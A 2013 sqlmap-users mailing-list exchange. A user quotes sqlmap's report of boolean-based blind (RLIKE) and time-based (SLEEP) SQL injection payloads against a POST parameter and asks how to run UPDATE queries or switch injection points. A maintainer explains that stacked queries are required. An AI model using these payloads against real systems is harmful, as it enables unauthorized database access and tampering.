Re: [sqlmap-users] stacked queries and different injection points

Mon, 18 Feb 2013 00:18:14 -0800 

Hi.

It's very simple. If stacking of queries is not supported (e.g.
id=1;UPDATE..) then you can't use non-query SQL statements. Pretty simple.

Bye
Dana 18.2.2013. 01:04 "Bruno Garcia" <garcia.bru...@gmail.com> je
napisao/la:

> Hello,
>
> I have this injection:
>
> Place: POST
> Parameter: xxxxx
>     Type: boolean-based blind
>     Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
> clause (RLIKE)
>     Payload: xxx=xxxx&xxxx=test' RLIKE IF(8894=8894,0x4d7953514c,0x28) AND
> 'qGgA'='qGgA
>     Vector: RLIKE IF([INFERENCE],[ORIGVALUE],0x28)
>
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 OR time-based blind
>     Payload: tipo=xxxxx&xxxxx=-1188' OR 7506=SLEEP(5) AND 'lBGC'='lBGC
>     Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
>
>
> and I get this when using UPDATE
>
> [WARNING] execution of custom SQL queries is only available when stacked
> queries are supported.
>
> Is there any workaround for this?
> Also, it shows that it detected two injections, and it's using the first
> one for doing the queries, is there anyway I could test the queries with
> the second injection?
>
> Thanks
>
>
>
>
>
>
> ------------------------------------------------------------------------------
> The Go Parallel Website, sponsored by Intel - in partnership with Geeknet,
> is your hub for all things parallel software development, from weekly
> thought
> leadership blogs to news, videos, case studies, tutorials, tech docs,
> whitepapers, evaluation guides, and opinion stories. Check out the most
> recent posts - join the conversation now.
> http://goparallel.sourceforge.net/
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

------------------------------------------------------------------------------
The Go Parallel Website, sponsored by Intel - in partnership with Geeknet, 
is your hub for all things parallel software development, from weekly thought 
leadership blogs to news, videos, case studies, tutorials, tech docs, 
whitepapers, evaluation guides, and opinion stories. Check out the most 
recent posts - join the conversation now. http://goparallel.sourceforge.net/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to